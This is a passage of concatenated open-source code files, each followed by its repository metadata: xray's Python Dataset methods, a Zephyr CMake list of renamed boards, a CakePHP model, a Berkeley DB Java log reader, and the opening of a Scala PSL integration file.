variables. If `copy=False` and no reindexing is required then
original variables from this dataset are returned.
**kw_indexers : optional
Keyword arguments in the same form as ``indexers``.
Returns
-------
reindexed : Dataset
Another dataset, with this dataset's data but replaced coordinates.
See Also
--------
Dataset.reindex_like
align
pandas.Index.get_indexer
"""
indexers = utils.combine_pos_and_kw_args(indexers, kw_indexers,
'reindex')
if not indexers:
# shortcut
return self.copy(deep=True) if copy else self
variables = alignment.reindex_variables(
self.variables, self.indexes, indexers, method, copy=copy)
return self._replace_vars_and_dims(variables)
def rename(self, name_dict, inplace=False):
"""Returns a new object with renamed variables and dimensions.
Parameters
----------
name_dict : dict-like
Dictionary whose keys are current variable or dimension names and
whose values are new names.
inplace : bool, optional
If True, rename variables and dimensions in-place. Otherwise,
return a new dataset object.
Returns
-------
renamed : Dataset
Dataset with renamed variables and dimensions.
See Also
--------
Dataset.swap_dims
DataArray.rename
"""
for k in name_dict:
if k not in self:
raise ValueError("cannot rename %r because it is not a "
"variable in this dataset" % k)
variables = OrderedDict()
coord_names = set()
for k, v in iteritems(self._variables):
name = name_dict.get(k, k)
dims = tuple(name_dict.get(dim, dim) for dim in v.dims)
var = v.copy(deep=False)
var.dims = dims
variables[name] = var
if k in self._coord_names:
coord_names.add(name)
return self._replace_vars_and_dims(variables, coord_names,
inplace=inplace)
def swap_dims(self, dims_dict, inplace=False):
"""Returns a new object with swapped dimensions.
Parameters
----------
dims_dict : dict-like
Dictionary whose keys are current dimension names and whose values
are new names. Each value must already be a variable in the
dataset.
inplace : bool, optional
If True, swap dimensions in-place. Otherwise, return a new dataset
object.
Returns
-------
renamed : Dataset
Dataset with swapped dimensions.
See Also
--------
Dataset.rename
DataArray.swap_dims
"""
for k, v in dims_dict.items():
if k not in self.dims:
raise ValueError('cannot swap from dimension %r because it is '
'not an existing dimension' % k)
if self.variables[v].dims != (k,):
raise ValueError('replacement dimension %r is not a 1D '
'variable along the old dimension %r'
% (v, k))
result_dims = set(dims_dict.get(dim, dim) for dim in self.dims)
variables = OrderedDict()
coord_names = self._coord_names.copy()
coord_names.update(dims_dict.values())
for k, v in iteritems(self.variables):
dims = tuple(dims_dict.get(dim, dim) for dim in v.dims)
var = v.to_coord() if k in result_dims else v.to_variable()
var.dims = dims
variables[k] = var
return self._replace_vars_and_dims(variables, coord_names,
inplace=inplace)
def update(self, other, inplace=True):
"""Update this dataset's variables with those from another dataset.
Parameters
----------
other : Dataset or castable to Dataset
Dataset or variables with which to update this dataset.
inplace : bool, optional
If True, merge the other dataset into this dataset in-place.
Otherwise, return a new dataset object.
Returns
-------
updated : Dataset
Updated dataset.
Raises
------
ValueError
If any dimensions would have inconsistent sizes in the updated
dataset.
"""
return self.merge(
other, inplace=inplace, overwrite_vars=list(other), join='left')
def merge(self, other, inplace=False, overwrite_vars=set(),
compat='broadcast_equals', join='outer'):
"""Merge the arrays of two datasets into a single dataset.
This method generally not allow for overriding data, with the exception
of attributes, which are ignored on the second dataset. Variables with
the same name are checked for conflicts via the equals or identical
methods.
Parameters
----------
other : Dataset or castable to Dataset
Dataset or variables to merge with this dataset.
inplace : bool, optional
If True, merge the other dataset into this dataset in-place.
Otherwise, return a new dataset object.
overwrite_vars : str or sequence, optional
If provided, update variables of these name(s) without checking for
conflicts in this dataset.
compat : {'broadcast_equals', 'equals', 'identical'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
join : {'outer', 'inner', 'left', 'right'}, optional
Method for joining ``self`` and ``other`` along shared dimensions:
- 'outer': use the union of the indexes
- 'inner': use the intersection of the indexes
- 'left': use indexes from ``self``
- 'right': use indexes from ``other``
Returns
-------
merged : Dataset
Merged dataset.
Raises
------
ValueError
If any variables conflict (see ``compat``).
"""
if compat not in ['broadcast_equals', 'equals', 'identical']:
raise ValueError("compat=%r invalid: must be 'broadcast_equals', "
"'equals' or 'identical'" % compat)
if isinstance(overwrite_vars, basestring):
overwrite_vars = [overwrite_vars]
overwrite_vars = set(overwrite_vars)
merge = _merge_dataset if isinstance(other, Dataset) else _merge_dict
replace_vars, new_vars, new_coord_names = merge(
self, other, overwrite_vars, compat=compat, join=join)
newly_coords = new_coord_names & (set(self) - set(self.coords))
no_longer_coords = set(self.coords) & (set(new_vars) - new_coord_names)
ambiguous_coords = (newly_coords | no_longer_coords) - overwrite_vars
if ambiguous_coords:
raise ValueError('cannot merge: the following variables are '
'coordinates on one dataset but not the other: %s'
% list(ambiguous_coords))
obj = self if inplace else self.copy()
obj._update_vars_and_coords(replace_vars, new_coord_names)
return obj
def _assert_all_in_dataset(self, names, virtual_okay=False):
bad_names = set(names) - set(self._variables)
if virtual_okay:
bad_names -= self.virtual_variables
if bad_names:
raise ValueError('One or more of the specified variables '
'cannot be found in this dataset')
def drop(self, labels, dim=None):
"""Drop variables or index labels from this dataset.
If a variable corresponding to a dimension is dropped, all variables
that use that dimension are also dropped.
Parameters
----------
labels : str
Names of variables or index labels to drop.
dim : None or str, optional
Dimension along which to drop index labels. By default (if
``dim is None``), drops variables rather than index labels.
Returns
-------
dropped : Dataset
"""
if utils.is_scalar(labels):
labels = [labels]
if dim is None:
return self._drop_vars(labels)
else:
new_index = self.indexes[dim].drop(labels)
return self.loc[{dim: new_index}]
def _drop_vars(self, names):
self._assert_all_in_dataset(names)
drop = set(names)
drop |= set(k for k, v in iteritems(self._variables)
if any(name in v.dims for name in names))
variables = OrderedDict((k, v) for k, v in iteritems(self._variables)
if k not in drop)
coord_names = set(k for k in self._coord_names if k in variables)
return self._replace_vars_and_dims(variables, coord_names)
def drop_vars(self, *names): # pragma: no cover
warnings.warn('the Dataset method `drop_vars` has been deprecated; '
'use `drop` instead',
FutureWarning, stacklevel=2)
return self.drop(names)
def transpose(self, *dims):
"""Return a new Dataset object with all array dimensions transposed.
Although the order of dimensions on each array will change, the dataset
dimensions themselves will remain in fixed (sorted) order.
Parameters
----------
*dims : str, optional
By default, reverse the dimensions on each array. Otherwise,
reorder the dimensions to this order.
Returns
-------
transposed : Dataset
Each array in the dataset (including) coordinates will be
transposed to the given order.
Notes
-----
Although this operation returns a view of each array's data, it
is not lazy -- the data will be fully loaded into memory.
See Also
--------
numpy.transpose
DataArray.transpose
"""
if dims:
if set(dims) ^ set(self.dims):
raise ValueError('arguments to transpose (%s) must be '
'permuted dataset dimensions (%s)'
% (dims, tuple(self.dims)))
ds = self.copy()
for name, var in iteritems(self._variables):
var_dims = tuple(dim for dim in dims if dim in var.dims)
ds._variables[name] = var.transpose(*var_dims)
return ds
@property
def T(self):
return self.transpose()
def squeeze(self, dim=None):
"""Returns a new dataset with squeezed data.
Parameters
----------
dim : None or str or tuple of str, optional
Selects a subset of the length one dimensions. If a dimension is
selected with length greater than one, an error is raised. If
None, all length one dimensions are squeezed.
Returns
-------
squeezed : Dataset
This dataset, but with with all or a subset of the dimensions of
length 1 removed.
Notes
-----
Although this operation returns a view of each variable's data, it is
not lazy -- all variable data will be fully loaded.
See Also
--------
numpy.squeeze
"""
return common.squeeze(self, self.dims, dim)
def dropna(self, dim, how='any', thresh=None, subset=None):
"""Returns a new dataset with dropped labels for missing values along
the provided dimension.
Parameters
----------
dim : str
Dimension along which to drop missing values. Dropping along
multiple dimensions simultaneously is not yet supported.
how : {'any', 'all'}, optional
* any : if any NA values are present, drop that label
* all : if all values are NA, drop that label
thresh : int, default None
If supplied, require this many non-NA values.
subset : sequence, optional
Subset of variables to check for missing values. By default, all
variables in the dataset are checked.
Returns
-------
Dataset
"""
# TODO: consider supporting multiple dimensions? Or not, given that
# there are some ugly edge cases, e.g., pandas's dropna differs
# depending on the order of the supplied axes.
if dim not in self.dims:
raise ValueError('%s must be a single dataset dimension' % dim)
if subset is None:
subset = list(self.data_vars)
count = np.zeros(self.dims[dim], dtype=np.int64)
size = 0
for k in subset:
array = self._variables[k]
if dim in array.dims:
dims = [d for d in array.dims if d != dim]
count += array.count(dims)
size += np.prod([self.dims[d] for d in dims])
if thresh is not None:
mask = count >= thresh
elif how == 'any':
mask = count == size
elif how == 'all':
mask = count > 0
elif how is not None:
raise ValueError('invalid how option: %s' % how)
else:
raise TypeError('must specify how or thresh')
return self.isel(**{dim: mask})
def fillna(self, value):
"""Fill missing values in this object.
This operation follows the normal broadcasting and alignment rules that
xray uses for binary arithmetic, except the result is aligned to this
object (``join='left'``) instead of aligned to the intersection of
index coordinates (``join='inner'``).
Parameters
----------
value : scalar, ndarray, DataArray, dict or Dataset
Used to fill all matching missing values in this dataset's data
variables. Scalars, ndarrays or DataArrays arguments are used to
fill all data with aligned coordinates (for DataArrays).
Dictionaries or datasets match data variables and then align
coordinates if necessary.
Returns
-------
Dataset
"""
return self._fillna(value)
def reduce(self, func, dim=None, keep_attrs=False, numeric_only=False,
allow_lazy=False, **kwargs):
"""Reduce this dataset by applying `func` along some dimension(s).
Parameters
----------
func : function
Function which can be called in the form
`f(x, axis=axis, **kwargs)` to return the result of reducing an
np.ndarray over an integer valued axis.
dim : str or sequence of str, optional
Dimension(s) over which to apply `func`. By default `func` is
applied over all dimensions.
keep_attrs : bool, optional
If True, the datasets's attributes (`attrs`) will be copied from
the original object to the new one. If False (default), the new
object will be returned without attributes.
numeric_only : bool, optional
If True, only apply ``func`` to variables with a numeric dtype.
**kwargs : dict
Additional keyword arguments passed on to ``func``.
Returns
-------
reduced : Dataset
Dataset with this object's DataArrays replaced with new DataArrays
of summarized data and the indicated dimension(s) removed.
"""
if isinstance(dim, basestring):
dims = set([dim])
elif dim is None:
dims = set(self.dims)
else:
dims = set(dim)
_assert_empty([dim for dim in dims if dim not in self.dims],
'Dataset does not contain the dimensions: %s')
variables = OrderedDict()
for name, var in iteritems(self._variables):
reduce_dims = [dim for dim in var.dims if dim in dims]
if reduce_dims or not var.dims:
if name not in self.coords:
if (not numeric_only
or np.issubdtype(var.dtype, np.number)
or var.dtype == np.bool_):
if len(reduce_dims) == 1:
# unpack dimensions for the benefit of functions
# like np.argmin which can't handle tuple arguments
reduce_dims, = reduce_dims
elif len(reduce_dims) == var.ndim:
# prefer to aggregate over axis=None rather than
# axis=(0, 1) if they will be equivalent, because
# the former is often more efficient
reduce_dims = None
variables[name] = var.reduce(func, dim=reduce_dims,
keep_attrs=keep_attrs,
allow_lazy=allow_lazy,
**kwargs)
else:
variables[name] = var
coord_names = set(k for k in self.coords if k in variables)
attrs = self.attrs if keep_attrs else None
return self._replace_vars_and_dims(variables, coord_names, attrs)
def apply(self, func, keep_attrs=False, args=(), **kwargs):
"""Apply a function over the data variables in this dataset.
Parameters
----------
func : function
Function which can be called in the form `f(x, **kwargs)` to
transform each DataArray `x` in this dataset into another
DataArray.
keep_attrs : bool, optional
If True, the dataset's attributes (`attrs`) will be copied from
the original object to the new one. If False, the new object will
be returned without attributes.
args : tuple, optional
Positional arguments passed on to `func`.
**kwargs : dict
Keyword arguments passed on to `func`.
Returns
-------
applied : Dataset
Resulting dataset from applying ``func`` over each data variable.
"""
variables = OrderedDict(
(k, maybe_wrap_array(v, func(v, *args, **kwargs)))
for k, v in iteritems(self.data_vars))
attrs = self.attrs if keep_attrs else None
return type(self)(variables, attrs=attrs)
def assign(self, **kwargs):
"""Assign new data variables to a Dataset, returning a new object
with all the original variables in addition to the new ones.
Parameters
----------
kwargs : keyword, value pairs
keywords are the variables names. If the values are callable, they
are computed on the Dataset and assigned to new data variables. If
the values are not callable, (e.g. a DataArray, scalar, or array),
they are simply assigned.
Returns
-------
ds : Dataset
A new Dataset with the new variables in addition to all the
existing variables.
Notes
-----
Since ``kwargs`` is a dictionary, the order of your arguments may not
be preserved, and so the order of the new variables is not well
defined. Assigning multiple variables within the same ``assign`` is
possible, but you cannot reference other variables created within the
same ``assign`` call.
See Also
--------
pandas.DataFrame.assign
"""
data = self.copy()
# do all calculations first...
results = data._calc_assign_results(kwargs)
# ... and then assign
data.update(results)
return data
def to_array(self, dim='variable', name=None):
"""Convert this dataset into an xray.DataArray
The data variables of this dataset will be broadcast against each other
and stacked along the first axis of the new array. All coordinates of
this dataset will remain coordinates.
Parameters
----------
dim : str, optional
Name of the new dimension.
name : str, optional
Name of the new data array.
Returns
-------
array : xray.DataArray
"""
from .dataarray import DataArray
data_vars = [self.variables[k] for k in self.data_vars]
broadcast_vars = broadcast_variables(*data_vars)
data = ops.stack([b.data for b in broadcast_vars], axis=0)
coords = dict(self.coords)
coords[dim] = list(self.data_vars)
dims = (dim,) + broadcast_vars[0].dims
return DataArray(data, coords, dims, attrs=self.attrs, name=name)
def _to_dataframe(self, ordered_dims):
columns = [k for k in self if k not in self.dims]
data = [self._variables[k].expand_dims(ordered_dims).values.reshape(-1)
for k in columns]
index = self.coords.to_index(ordered_dims)
return pd.DataFrame(OrderedDict(zip(columns, data)), index=index)
def to_dataframe(self):
"""Convert this dataset into a pandas.DataFrame.
Non-index variables in this dataset form the columns of the
DataFrame. The DataFrame is be indexed by the Cartesian product of
this dataset's indices.
"""
return self._to_dataframe(self.dims)
@classmethod
def from_dataframe(cls, dataframe):
"""Convert a pandas.DataFrame into an xray.Dataset
Each column will be converted into an independent variable in the
Dataset. If the dataframe's index is a MultiIndex, it will be expanded
into a tensor product of one-dimensional indices (filling in missing
values with NaN). This method will produce a Dataset very similar to
that on which the 'to_dataframe' method was called, except with
possibly redundant dimensions (since all dataset variables will have
the same dimensionality).
"""
# TODO: Add an option to remove dimensions along which the variables
# are constant, to enable consistent serialization to/from a dataframe,
# even if some variables have different dimensionality.
idx = dataframe.index
obj = cls()
if hasattr(idx, 'levels'):
# it's a multi-index
# expand the DataFrame to include the product of all levels
full_idx = pd.MultiIndex.from_product(idx.levels, names=idx.names)
dataframe = dataframe.reindex(full_idx)
dims = [name if name is not None else 'level_%i' % n
for n, name in enumerate(idx.names)]
for dim, lev in zip(dims, idx.levels):
obj[dim] = (dim, lev)
shape = [lev.size for lev in idx.levels]
else:
if idx.size:
dims = (idx.name if idx.name is not None else 'index',)
obj[dims[0]] = (dims, idx)
else:
dims = []
shape = -1
for name, series in iteritems(dataframe):
data = series.values.reshape(shape)
obj[name] = (dims, data)
return obj
@staticmethod
def _unary_op(f):
@functools.wraps(f)
def func(self, *args, **kwargs):
ds = self.coords.to_dataset()
for k in self.data_vars:
ds._variables[k] = f(self._variables[k], *args, **kwargs)
return ds
return func
@staticmethod
def _binary_op(f, reflexive=False, join='inner', drop_na_vars=True):
@functools.wraps(f)
def func(self, other):
if isinstance(other, groupby.GroupBy):
return NotImplemented
if hasattr(other, 'indexes'):
self, other = align(self, other, join=join, copy=False)
empty_indexes = [d for d, s in self.dims.items() if s == 0]
if empty_indexes:
raise ValueError('no overlapping labels for some '
'dimensions: %s' % empty_indexes)
g = f if not reflexive else lambda x, y: f(y, x)
ds = self._calculate_binary_op(g, other, drop_na_vars=drop_na_vars)
return ds
return func
@staticmethod
def _inplace_binary_op(f):
@functools.wraps(f)
def func(self, other):
if isinstance(other, groupby.GroupBy):
raise TypeError('in-place operations between a Dataset and '
'a grouped object are not permitted')
if hasattr(other, 'indexes'):
other = other.reindex_like(self, copy=False)
# we don't want to actually modify arrays in-place
g = ops.inplace_to_noninplace_op(f)
ds = self._calculate_binary_op(g, other, inplace=True)
self._replace_vars_and_dims(ds._variables, ds._coord_names,
ds._attrs, inplace=True)
return self
return func
def _calculate_binary_op(self, f, other, inplace=False, drop_na_vars=True):
def apply_over_both(lhs_data_vars, rhs_data_vars, lhs_vars, rhs_vars):
dest_vars = OrderedDict()
performed_op = False
for k in lhs_data_vars:
if k in rhs_data_vars:
dest_vars[k] = f(lhs_vars[k], rhs_vars[k])
performed_op = True
elif inplace:
raise ValueError(
'datasets must have the same data variables '
'for in-place arithmetic operations: %s, %s'
% (list(lhs_data_vars), list(rhs_data_vars)))
elif not drop_na_vars:
# this shortcuts left alignment of variables for fillna
dest_vars[k] = lhs_vars[k]
if not performed_op:
raise ValueError(
'datasets have no overlapping data variables: %s, %s'
% (list(lhs_data_vars), list(rhs_data_vars)))
return dest_vars
if utils.is_dict_like(other) and not isinstance(other, Dataset):
# can't use our shortcut of doing the binary operation with
# Variable objects, so apply over our data vars instead.
new_data_vars = apply_over_both(self.data_vars, other,
self.data_vars, other)
return Dataset(new_data_vars)
other_coords = getattr(other, 'coords', None)
ds = self.coords.merge(other_coords)
if isinstance(other, Dataset):
new_vars = apply_over_both(self.data_vars, other.data_vars,
self.variables, other.variables)
else:
other_variable = getattr(other, 'variable', other)
new_vars = OrderedDict((k, f(self.variables[k], other_variable))
for k in self.data_vars)
ds._variables.update(new_vars)
return ds
ops.inject_all_ops_and_reduce_methods(Dataset, array_only=False)
| kjordahl/xray | xray/core/dataset.py | Python | apache-2.0 | 72,806 |
# SPDX-License-Identifier: Apache-2.0
# This file contains boards in Zephyr which has been replaced with a new board
# name.
# This allows the system to automatically change the board while at the same
# time prints a warning to the user, that the board name is deprecated.
#
# To add a board rename, add a line in following format:
# set(<old_board_name>_DEPRECATED <new_board_name>)
set(bl5340_dvk_cpuappns_DEPRECATED bl5340_dvk_cpuapp_ns)
set(mps2_an521_nonsecure_DEPRECATED mps2_an521_ns)
set(musca_b1_nonsecure_DEPRECATED musca_b1_ns)
set(musca_s1_nonsecure_DEPRECATED musca_s1_ns)
set(nrf5340dk_nrf5340_cpuappns_DEPRECATED nrf5340dk_nrf5340_cpuapp_ns)
set(nrf9160dk_nrf9160ns_DEPRECATED nrf9160dk_nrf9160_ns)
set(circuitdojo_feather_nrf9160ns_DEPRECATED circuitdojo_feather_nrf9160_ns)
set(nrf9160_innblue21ns_DEPRECATED nrf9160_innblue21_ns)
set(nrf9160_innblue22ns_DEPRECATED nrf9160_innblue22_ns)
set(sparkfun_thing_plus_nrf9160ns_DEPRECATED sparkfun_thing_plus_nrf9160_ns)
set(thingy53_nrf5340_cpuappns_DEPRECATED thingy53_nrf5340_cpuapp_ns)
| galak/zephyr | boards/deprecated.cmake | CMake | apache-2.0 | 1,054 |
<?php
App::uses('AppModel', 'Model');
/**
* ProdCodeDivn Model
*
* @property ProdCodeSection $ProdCodeSection
* @property ProdCodeGroup $ProdCodeGroup
*/
class ProdCodeDivn extends AppModel {
/**
* Display field
*
* @var string
*/
public $displayField = 'divn_desc_eng';
/**
* Validation rules
*
* @var array
*/
public $validate = array(
'prod_code_section_id' => array(
'notempty' => array(
'rule' => array('notempty'),
//'message' => 'Your custom message here',
//'allowEmpty' => false,
//'required' => false,
//'last' => false, // Stop validation after this rule
//'on' => 'create', // Limit validation to 'create' or 'update' operations
),
),
'divn_code' => array(
'numeric' => array(
'rule' => array('numeric'),
//'message' => 'Your custom message here',
//'allowEmpty' => false,
//'required' => false,
//'last' => false, // Stop validation after this rule
//'on' => 'create', // Limit validation to 'create' or 'update' operations
),
),
);
//The Associations below have been created with all possible keys, those that are not needed can be removed
/**
* belongsTo associations
*
* @var array
*/
public $belongsTo = array(
'ProdCodeSection' => array(
'className' => 'ProdCodeSection',
'foreignKey' => 'prod_code_section_id',
'conditions' => '',
'fields' => '',
'order' => ''
)
);
/**
* hasMany associations
*
* @var array
*/
/*
public $hasMany = array(
'ProdCodeGroup' => array(
'className' => 'ProdCodeGroup',
'foreignKey' => 'prod_code_divn_id',
'dependent' => false,
'conditions' => '',
'fields' => '',
'order' => '',
'limit' => '',
'offset' => '',
'exclusive' => '',
'finderQuery' => '',
'counterQuery' => ''
)
);*/
}
| hasanmbstu13/Project | Cakephp/ec2014/app/Model/ProdCodeDivn.php | PHP | apache-2.0 | 1,803 |
/*-
* See the file LICENSE for redistribution information.
*
* Copyright (c) 2002-2010 Oracle. All rights reserved.
*
* $Id: ReplicaSyncupReader.java,v 1.4 2010/01/11 20:00:48 linda Exp $
*/
package com.sleepycat.je.rep.stream;
import static com.sleepycat.je.utilint.DbLsn.NULL_LSN;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.util.logging.Level;
import java.util.logging.Logger;
import com.sleepycat.je.DatabaseException;
import com.sleepycat.je.EnvironmentFailureException;
import com.sleepycat.je.dbi.EnvironmentImpl;
import com.sleepycat.je.log.LogEntryType;
import com.sleepycat.je.log.entry.LogEntry;
import com.sleepycat.je.recovery.CheckpointEnd;
import com.sleepycat.je.rep.impl.node.NameIdPair;
import com.sleepycat.je.rep.vlsn.VLSNIndex;
import com.sleepycat.je.rep.vlsn.VLSNRange;
import com.sleepycat.je.txn.TxnCommit;
import com.sleepycat.je.utilint.LoggerUtils;
import com.sleepycat.je.utilint.VLSN;
/**
* The ReplicaSyncupReader scans the log backwards for requested log entries.
* The reader must track whether it has passed a checkpoint, and therefore
* can not used the vlsn index to skip over entries.
*
* The ReplicaSyncupReader is not thread safe, and can only be used
* serially. It will stop at the finishLsn, which should be set using the
* GlobalCBVLSN.
*/
public class ReplicaSyncupReader extends VLSNReader {
/* True if this particular record retrieval is for a syncable record. */
private boolean syncableSearch;
private final LogEntry ckptEndLogEntry =
LogEntryType.LOG_CKPT_END.getNewLogEntry();
private final LogEntry commitLogEntry =
LogEntryType.LOG_TXN_COMMIT.getNewLogEntry();
/*
* SearchResults retains the information as to whether the found
* matchpoint is valid.
*/
private final MatchpointSearchResults searchResults;
private final Logger logger;
public ReplicaSyncupReader(EnvironmentImpl envImpl,
VLSNIndex vlsnIndex,
long endOfLogLsn,
int readBufferSize,
NameIdPair nameIdPair,
VLSN startVLSN,
long finishLsn,
MatchpointSearchResults searchResults)
throws IOException, DatabaseException {
/*
* If we go backwards, endOfFileLsn and startLsn must not be null.
* Make them the same, so we always start at the same very end.
*/
super(envImpl,
vlsnIndex,
false, // forward
endOfLogLsn,
readBufferSize,
nameIdPair,
finishLsn);
initScan(startVLSN, endOfLogLsn);
this.searchResults = searchResults;
logger = LoggerUtils.getLogger(getClass());
}
/**
* Set up the ReplicaSyncupReader to start scanning from this VLSN.
* @throws IOException
*/
private void initScan(VLSN startVLSN, long endOfLogLsn)
throws IOException {
if (startVLSN.equals(VLSN.NULL_VLSN)) {
throw EnvironmentFailureException.unexpectedState
("ReplicaSyncupReader start can't be NULL_VLSN");
}
startLsn = endOfLogLsn;
assert startLsn != NULL_LSN;
/*
* Flush the log so that syncup can assume that all log entries that
* are represented in the VLSNIndex are safely out of the log buffers
* and on disk. Simplifies this reader, so it can use the regular
* ReadWindow, which only works on a file.
*/
envImpl.getLogManager().flush();
window.initAtFileStart(startLsn);
currentEntryPrevOffset = window.getEndOffset();
currentEntryOffset = window.getEndOffset();
currentVLSN = startVLSN;
}
/**
* Backward scanning for the replica's part in syncup.
*/
public OutputWireRecord scanBackwards(VLSN vlsn)
throws DatabaseException {
syncableSearch = false;
VLSNRange range = vlsnIndex.getRange();
if (vlsn.compareTo(range.getFirst()) < 0) {
/*
* The requested VLSN is before the start of our range, we don't
* have this record.
*/
return null;
}
currentVLSN = vlsn;
if (readNextEntry()) {
return currentFeedRecord;
}
return null;
}
/**
* Backward scanning for finding an earlier candidate syncup matchpoint.
*/
public OutputWireRecord findPrevSyncEntry()
throws DatabaseException {
currentFeedRecord = null;
syncableSearch = true;
/* Start by looking at the entry before the current record. */
currentVLSN = currentVLSN.getPrev();
VLSNRange range = vlsnIndex.getRange();
if (currentVLSN.compareTo(range.getFirst()) < 0) {
/*
* We've walked off the end of the contiguous VLSN range.
*/
return null;
}
if (readNextEntry() == false) {
/*
* We scanned all the way to the front of the log, no
* other sync-able entry found.
*/
return null;
}
assert LogEntryType.isSyncPoint(currentFeedRecord.getEntryType()) :
"Unexpected log type= " + currentFeedRecord;
return currentFeedRecord;
}
/**
* @throw an EnvironmentFailureException if we were scanning for a
* particular VLSN and we have passed it by.
*/
private void checkForPassingTarget(int compareResult) {
if (compareResult < 0) {
/* Hey, we passed the VLSN we wanted. */
throw EnvironmentFailureException.unexpectedState
("want to read " + currentVLSN + " but reader at " +
currentEntryHeader.getVLSN());
}
}
/**
* Return true for ckpt entries, for syncable entries, and if we're in
* specific vlsn scan mode, any replicated entry. There is an additional
* level of filtering in processEntry.
*/
@Override
protected boolean isTargetEntry()
throws DatabaseException {
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" isTargetEntry " + currentEntryHeader);
}
nScanned++;
/* Skip invisible entries. */
if (currentEntryHeader.isInvisible()) {
return false;
}
byte currentType = currentEntryHeader.getType();
/*
* Return true if this entry is replicated. All entries need to be
* perused by processEntry, when we are doing a vlsn based search,
* even if they are not a sync point, because:
* (a) If this is a vlsn-based search, it's possible that the replica
* and feeder are mismatched. The feeder will only propose a sync type
* entry as a matchpoint but it might be that the replica has a non-
* sync entry at that vlsn.
* (b) We need to note passed commits in processEntry.
*/
if (entryIsReplicated()) {
if (syncableSearch) {
if (LogEntryType.isSyncPoint(currentType)) {
return true;
}
currentVLSN = currentEntryHeader.getVLSN().getPrev();
} else {
return true;
}
}
/*
* We'll also need to read checkpoint end records to record their
* presence.
*/
if (LogEntryType.LOG_CKPT_END.equalsType(currentType)) {
return true;
}
return false;
}
/**
* ProcessEntry does additional filtering before deciding whether to
* return an entry as a candidate for matching.
*
* If this is a record we are submitting as a matchpoint candidate,
* instantiate a WireRecord to house this log entry. If this is a
* non-replicated entry or a txn end that follows the candidate matchpoint,
* record whatever status we need to, but don't use it for comparisons.
*
* For example, suppose the log is like this:f
*
* VLSN entry
* 10 LN
* 11 commit
* 12 LN
* -- ckpt end
* 13 commit
* 14 abort
*
* And that the master only has VLSNs 1-12. The replica will suggest vlsn
* 14 as the first matchpoint. The feeder will counter with a suggestion
* of vlsn 11, since it doe not have vlsn 14.
*
* At that point, the ReplicaSyncupReader will scan backwards in the log,
* looking for vlsn 11. Although the reader should only return an entry
* when it gets to vlsn 11. the reader must process commits and ckpts that
* follow 11, so that they can be recorded in the searchResults, so the
* number of rolled back commits can be accurately reported.
*/
@Override
protected boolean processEntry(ByteBuffer entryBuffer) {
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" syncup reader saw " + currentEntryHeader);
}
byte currentType = currentEntryHeader.getType();
/*
* CheckpointEnd entries are tracked in order to see if a rollback
* must be done, but are not returned as possible matchpoints.
*/
if (LogEntryType.LOG_CKPT_END.equalsType(currentType)) {
/*
* Read the entry, which both lets us decipher its contents and
* also advances the file reader position.
*/
ckptEndLogEntry.readEntry(currentEntryHeader, entryBuffer,
true /*readFullItem*/);
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
" syncup reader read " +
currentEntryHeader + ckptEndLogEntry);
}
if (((CheckpointEnd) ckptEndLogEntry.getMainItem()).
getCleanedFilesToDelete()) {
searchResults.notePassedCheckpointEnd();
}
return false;
}
/*
* Setup the log entry as a wire record so we can compare it to
* the entry from the feeder as we look for a matchpoint. Do this
* before we change positions on the entry buffer by reading it.
*/
ByteBuffer buffer = entryBuffer.slice();
buffer.limit(currentEntryHeader.getItemSize());
currentFeedRecord = new OutputWireRecord(currentEntryHeader, buffer);
/*
* All commit records must be tracked to figure out if we've exceeded
* the txn rollback limit. For reporting reasons, we'll need to
* unmarshal the log entry, so we can read the timestamp in the commit
* record.
*/
if (LogEntryType.LOG_TXN_COMMIT.equalsType(currentType)) {
commitLogEntry.readEntry(currentEntryHeader, entryBuffer,
true /*readFullItem*/);
TxnCommit commit = (TxnCommit) commitLogEntry.getMainItem();
searchResults.notePassedCommits(commit.getTime(),
commit.getId(),
currentEntryHeader.getVLSN(),
getLastLsn());
if (logger.isLoggable(Level.FINEST)) {
LoggerUtils.finest(logger, envImpl,
"syncup reader read " +
currentEntryHeader + commitLogEntry);
}
} else {
entryBuffer.position(entryBuffer.position() +
currentEntryHeader.getItemSize());
}
if (syncableSearch) {
return true;
}
/* We're looking for a particular VLSN. */
int compareResult = currentEntryHeader.getVLSN().compareTo(currentVLSN);
checkForPassingTarget(compareResult);
/* return true if this is the entry we want. */
return (compareResult == 0);
}
}
| bjorndm/prebake | code/third_party/bdb/src/com/sleepycat/je/rep/stream/ReplicaSyncupReader.java | Java | apache-2.0 | 12,355 |
package so.modernized.whip
import java.util.{Set => JSet}
import java.net.{URI => JURI}
import com.cambridgesemantics.anzo.unstructured.graphsummarization.PatternSolutionExtras
import com.cambridgesemantics.anzo.unstructured.graphsummarization.XMLUnapplicable._
import so.modernized.psl_scala.primitives.PSLUnapplicable._
import so.modernized.psl_scala.primitives.{PSLUnapplicable, PSLVar}
import so.modernized.whip.URIUniqueId._
import so.modernized.whip.sparql.QueryIterator
import so.modernized.whip.util._
import scala.util.{Failure, Success, Try}
import scala.collection.JavaConverters._
import scala.collection.mutable
import com.cambridgesemantics.anzo.utilityservices.common.EncodingUtils
import edu.umd.cs.psl.database.loading.{Updater, Inserter}
import edu.umd.cs.psl.database._
import edu.umd.cs.psl.model.argument._
import edu.umd.cs.psl.model.atom._
import edu.umd.cs.psl.model.predicate.{SpecialPredicate, FunctionalPredicate, Predicate, StandardPredicate}
import org.openanzo.client.IAnzoClient
import org.openanzo.rdf.{URI => AnzoURI, Statement, Value}
class TypedStandardPredicate[A, B](name:String, val uriType:AnzoURI, val domain:AnzoURI, val range:AnzoURI)(implicit aEv:PSLUnapplicable[A], bEv:PSLUnapplicable[B]) extends StandardPredicate(name, Array(aEv.argType, bEv.argType))
/**
* A Variable that is typed by the rdf:class of the arguments that it can take (determined by @uriType)
*/
case class TypedVariable(name:String, uriType:AnzoURI) extends Variable(name) {
override def toString = name
}
object TypedVariable {
def tv(name:String, uri:AnzoURI) = new TypedVariable(name, uri)
}
object PSLURIVar {
def unapply(t:Term) = t match {
case v:TypedVariable => Some(v)
case _ => None
}
}
/*
class LazyResultList(iter:QueryIterator, varPos:Map[Variable, Int], val size:Int) extends ResultList {
